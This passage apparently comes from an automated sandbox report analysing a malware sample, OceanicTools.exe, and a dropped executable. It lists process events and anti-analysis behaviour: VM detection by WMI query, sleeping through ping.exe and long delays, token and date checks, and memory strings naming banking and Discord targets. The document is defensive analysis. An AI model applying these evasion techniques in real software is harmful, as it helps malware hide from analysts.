Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: qflwedtkihuzyxlg.exe, 0000000B.00000002.2645724843.00000227C6785000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE'
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6682 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3111 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7725 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1955 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Dropped PE file which has not been started: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe API coverage: 8.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\OceanicTools.exe TID: 1672 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 6682 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 3111 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508 Thread sleep count: 7725 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508 Thread sleep count: 1955 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B6740 FindClose,FindFirstFileExW,GetLastError, 14_2_00000001400B6740
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B67F0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 14_2_00000001400B67F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D00F8 FindFirstFileW, 14_2_00000001400D00F8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007EF60 GetLogicalDriveStringsW, 14_2_000000014007EF60
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D0140 GetSystemInfo, 14_2_00000001400D0140
Source: C:\Users\user\Desktop\OceanicTools.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\wtr\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\hwvid-migration-2\ Jump to behavior
Source: OceanicTools.exe Binary or memory string: VMware
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
